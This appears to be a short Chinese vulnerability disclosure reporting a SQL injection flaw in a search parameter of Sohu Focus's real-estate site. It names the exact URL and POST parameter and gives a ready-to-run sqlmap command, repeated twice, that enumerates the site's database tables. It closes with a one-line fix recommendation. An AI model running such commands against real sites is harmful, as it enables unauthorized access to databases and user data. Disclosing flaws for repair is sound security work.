搜狐焦点房产 主站SQL注射 可致数据库信息泄露下载

搜狐焦点房产主站SQL注入漏洞可致数据库信息泄露SQLMAP验证

漏洞位置：

（POST）http://house.focus.cn/housemarket/loushu/more.php

imageField5=&q_loushu_name=bgkeqnpf

参数q_loushu_name过滤不严引发注射



 

C:\Users\Administrator>sqlmap.py -u "http://house.focus.cn/housemarket/loushu/more.php" --data="imageField5=&q_loushu_name=bgkeqnpf" -p q_loushu_name --level 5 --tables

注意用的是level 5

后来访问过快ip被ban了，就不继续了

C:\Users\Administrator>sqlmap.py -u "http://house.focus.cn/housemarket/loushu/more.php" --data="imageField5=&q_loushu_name=bgkeqnpf" -p q_loushu_name --level 5 --tables

注意用的是level 5

 

修复方案：

加强参数过滤